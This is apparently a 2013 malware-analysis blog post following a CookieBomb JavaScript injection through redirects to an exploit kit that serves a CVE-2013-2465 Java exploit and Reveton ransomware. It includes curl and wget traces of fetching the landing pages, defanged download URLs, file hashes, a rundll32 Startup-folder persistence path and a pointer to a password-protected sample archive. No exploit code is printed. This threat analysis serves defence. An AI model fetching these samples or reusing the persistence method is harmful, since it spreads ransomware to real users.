Active CookieBomb, CVE 2013-2465 and Reveton

This is the second QuickAnalysis post after the one by evilcry;
During my daily urlquery investigation (, I come across a website infected by the CookieBomb injection payload.


The JS inside the index page, obviously, is obfuscated:


after deobfuscation we have this:


The code above clearly shows a classical CookieBomb Javascript infection. What is it? In poor words, first, there is control if a cookie is present and if it matches no action is taken, otherwise it will be built an iframe that goes to the landing page.

What interests us is the landing page, in this case:


Luckily for us, I managed to take when it was active and redirects the victim to an infected page:

$ curl --config ~/.curlrc1 -v
* Adding handle: conn: 0xc595e0
* Adding handle: send: 0
* Adding handle: recv: 0
* Curl_addHandleToPipeline: length: 1
* - Conn 0 (0xc595e0) send_pipe: 1, recv_pipe: 0
* About to connect() to port 80 (#0)
*   Trying
* Connected to ( port 80 (#0)
> GET /images/esd.php HTTP/1.1
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
> Host:
> Referer:
> Accept:text/html, application/xhtml+xml, */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> Connection: Keep-Alive
< HTTP/1.1 302 Found
< Date: Wed, 11 Sep 2013 07:20:35 GMT
* Server Apache/2.4.4 (Unix) mod_fcgid/2.3.7 is not blacklisted
< Server: Apache/2.4.4 (Unix) mod_fcgid/2.3.7
< X-Powered-By: PHP/5.3.27
< Location:
< Content-Length: 0
< Keep-Alive: timeout=5, max=100
< Connection: Keep-Alive
< Content-Type: text/html
* Connection #0 to host left intact

Let me first explain the curl command, i have passed two arguments:

-v, –verbose       Make the operation more talkative
–config FILE   Specify which config file to read ;  and in the follow the .curlrc1

header = "Accept:text/html, application/xhtml+xml, */*"
header = "Accept-Language: en-us"
header = "Accept-Encoding: gzip, deflate"
header = "Connection: Keep-Alive"

user-agent = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
referer = ""

Returning to the analysis, as we can see, we have another redirect, this time to the “ExploitKit”, which in this case is CoolEK (in the final notes I will explain the reason for this conclusion).


$ wget
--2013-09-11 09:20:05--
Risoluzione di (
Connessione a (||:1024... connesso.
Richiesta HTTP inviata, in attesa di risposta... 200 OK
Lunghezza: non specificato 
Salvataggio in: "selfish-bright_privacy-wooden.php"

    [ <=>                                                                                  ] 3.673       --.-K/s   in 0s      

2013-09-11 09:20:05 (179 MB/s) - "selfish-bright_privacy-wooden.php" salvato [3673]

Let’s see the content: (I’ve removed the parts with the comments)


What it does? First “innocent-absurd_obey.js” ( is the JS devoted to the control and  information gathering of the browser and related plugins installed, why? Because this “ExploitKit” drops among the other things the CVE-2013-2465.

CVE-2013-2465 hxxp://

SHA256: 699edfd71ddd15316904b1d2c1077bd6d4b87defda358a2a12147a31073295a5
SHA1: 	ada48487433324ebd891c99aeaa967f7328f0de3
MD5: 	066f992f5cf7df156860893bb6ee7ed7
File size: 	111.3 KB ( 113926 bytes )
File name: 	lay_hostage.jar
File type: 	ZIP
Detection ratio: 	4 / 46
Analysis date: 	2013-09-11 07:39:10 UTC


Reveton hxxp://
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

SHA256: 	639b9668ebaa695adec65f878721051b9fbfef2dbc18b0d2ec1acbff4f67400b
SHA1: 	bccbaa3c8081da59eefbed58250d179204ce5994
MD5: 	7c48c2acf32bf88deabf959ff9ce9532
File size: 	88.5 KB ( 90624 bytes )
File name: 	7c48c2acf32bf88deabf959ff9ce9532
File type: 	Win32 DLL
Detection ratio: 	18 / 46
Analysis date: 	2013-09-11 07:24:34 UTC

During investigation the landing page hxxp:// returned other domains  infected with the same files, JS and dropped.


The activation time has no logical sense, when the redirect it’s not active, the landing page returns “ok”

HTTP/1.1 200 OK
Date: Wed, 11 Sep 2013 15:26:24 GMT
* Server Apache/2.4.4 (Unix) mod_fcgid/2.3.7 is not blacklisted
Server: Apache/2.4.4 (Unix) mod_fcgid/2.3.7
X-Powered-By: PHP/5.3.27
Content-Length: 2
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

* Connection #0 to host left intact

At the end of the post I put a bit of intelligence made ​​on the domains connected to the various active IPs.

Why I think that the involved ExploitKit is CoolEK? Two main reasons:

First: while I was working on IPs intelligence, the same were infected with CoolEK:

Second: a tweet from @Set Abominae  “Cool Exploit Kit has now started to use port 1024“, what is our port.


A Brief Analysis of Reveton

After I’ve injected the DLL in an active process, rundll32.exe is launched with dll path and export GL300


that it is the export necessary for start the fake Page:


and dropped a .lnk file in Startup Folder:

C:\WINDOWS\system32\rundll32.exe C:\DOCUME~1\ALLUSE~1\DATIAP~1\q39w8z8.plz,GL300

After that injection and malware routine are completed, the system reboot and the fake page spawned.

In the Windows reference we read:
In the wild, we have observed variants of Trojan:Win32/Reveton downloading these DLL files, images and other bundled malware from the following IP addresses, using port 80 or 443

In our case the ip is:, ASN: AS44050 Petersburg Internet Network LLC, Location: Russian Federation

Thanks for reading this QuickAnalysis, below some information that might come handy:

MD5 of the CVE’s content:

2ca3e48ea629d2fea1d3c6ac30d10799  Addoo.class
e9583b7a40c437dfd83339e351c037e2  Addoo2.class
c955e3c3f937bae06e96e4fae0c74237  Tt.class
d3b529285108d94bbac72137db10c538  buslctvhfuryr.class
1f234c8535d2f2f61b51d76b56520f15  ekegauvfvcglbt.class
55289a5cfd9ad4b0aa0a83c98671da7e  gvcjmhuabewgvmujaekhcedh.class
02196f032a92070ed5258a60ad319914  jfdhrdvduvrefldtcrrdf.class
cf6507664c87121e4b3134df4fb87e5c  mawwdeel.class
caddda6c0d31adc48ccbccfb7401452d  mmwbu.class
f3e1702d0310c5f36e31e01ba98e9fb3  pfagw.class
b48ad335e80b07b978169a44637cf567  pyscedwc.class
62a1621ffb280767afa94b9edb009280  qeajcusrdwlncdbwbdc.class
ba46dc2c0bfa8aad769508c1b40e1775  qjutgmqhtuypfjlmdspdbj.class
880b4901826059273dc34f936d8b2377  sqhwrqsyglemtgpacldkmuvbl.class
54ed4794cdc97dc19f5593d5e328b209  vbvqteemwnt.class
eab069c38b8fc5499cbdf91f7b901a99  vcsemrgtm.class

PS: eacc41f1eb26f57b227a79b987a41991.deb is a file in CVE’s .jar, after reading Kafeine link may be Urausy or Reveton xored, I haven’t checked yet.

All files are placed in the zip file (password: infected):



CVE 2013-2465:

CookieBomb :



  1. hxxp://
    is now serving 8f78b1665fd080ffc149f0ec7ec694cb (DLL) with 0/46 on VirusTotal:

  2. Still active: Location: hxxp://

    Reveton: hxxp://\?e\=21

    SHA256: 5d8d47632c936df4cb3ef15ac39b74fbaea6db61833234a9172e92fbef37115c
    SHA1: 3e012b420d308e72a2df2edb91b9e02f610462bd
    MD5: 6d394232f16fe38f3225ef77270559ae
    File size: 187.9 KB ( 192410 bytes )
    File name: spider-birthday.txt?e=21
    File type: Win32 DLL
    Detection ratio: 1 / 48
    Analysis date: 2013-09-19 16:13:23 UTC

    CVE-2013-2465: hxxp://
    SHA256: c4f563c71d90ea21c0076549572ff3f28d74fee2195934ec11ad1b55fd5e2508
    SHA1: fe65df871d4f56a9389ab30c5819c4874c008b73
    MD5: 2043f8854cd5613abd136323252203e5
    File size: 32.9 KB ( 33664 bytes )
    File name: rectangle-bus_constant.jar
    Detection ratio: 8 / 48
    Analysis date: 2013-09-19 16:13:39 UTC

  3. Still Active: hxxp://

    Reveton: hxxp://

    SHA256: e21345f8dcc271db9322a2d94a8fc261bd27f8e238a14cac18fcc599caf1543d
    SHA1: e501e5d9833187cf804b0b360ea8b43291327f18
    MD5: 6b72314693b4aeca1ec7a09153bd248e
    File size: 100.0 KB ( 102400 bytes )
    File name: without_found_remedy_learn.txt?e=21
    Detection ratio: 4 / 48
    Analysis date: 2013-09-26 06:45:48 UTC

    CVE-2013-2465: hxxp://

    SHA256: eb71f795515a3da20774fa4e1d949073e1d4347a5475f0b36a6f9d6869d2c1c7
    SHA1: c27a8fecad440488d430ee11724e7024c8371dd3
    MD5: e419739e96913eb6e2b6793f7dd11a7b
    File size: 33.0 KB ( 33826 bytes )
    File name: release_successor-therefore-solitary.jar
    Detection ratio: 4 / 48
    Analysis date: 2013-09-26 06:47:17 UTC